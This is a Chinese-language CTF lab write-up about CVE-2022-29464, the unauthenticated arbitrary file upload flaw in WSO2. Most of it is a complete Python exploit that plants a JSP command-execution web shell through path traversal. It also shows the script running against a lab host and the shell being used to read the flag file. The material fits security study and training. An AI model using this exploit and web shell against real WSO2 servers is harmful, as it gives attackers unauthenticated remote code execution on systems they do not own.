CVE-2022-29464
一、漏洞介绍
WSO2文件上传漏洞(CVE-2022-29464)是Orange Tsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE。
二、渗透步骤
1、打开网站
https://eci-2ze93woxli32brxbox87.cloudeci1.ichunqiu.com:9443
2、POC脚本
URL:https://github.com/wave-to/Poc/blob/main/FileUpload/CVE-2022-29464.py
import requests
import argparse
def exploit(url):
uurl = "http://"+url+"/fileupload/toolsAny"
shell = """<FORM>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
<pre><%=output %></pre>"""
files = {f"../../../../repository/deployment/server/webapps/authenticationendpoint/wavesky.jsp": shell}
response = requests.post(url=uurl,files=files,verify=False)
if(response.status_code == 200):
print('It looks likely vulnerable')
print('Please use this url:'+'{\33[91m'+'http://'+url+'/authenticationendpoint/wavesky.jsp'+'\33[0m}'+' to view and attack~')
else:
print('It is strong')
if __name__ == '__main__':
parameter = argparse.ArgumentParser(description='Poc CVE-2022-29464:')
parameter.add_argument('--file',help='url file',required=False)
parameter.add_argument('--url',help='ip:port',required=False)
para = parameter.parse_args()
if para.url:
exploit(para.url)
exit()
else:
parameter.print_help()
3、执行POC
┌──(kali㉿kali)-[~]
└─$ python3 CVE-2022-29464.py --url eci-2ze51ryor8399c5eaude.cloudeci1.ichunqiu.com:9445
It looks likely vulnerable
Please use this url:{http://eci-2ze51ryor8399c5eaude.cloudeci1.ichunqiu.com:9445/authenticationendpoint/wavesky.jsp} to view and attack~
4、查找flag
http://eci-2ze51ryor8399c5eaude.cloudeci1.ichunqiu.com:9445/authenticationendpoint/wavesky.jsp?cmd=cat+%2Fflag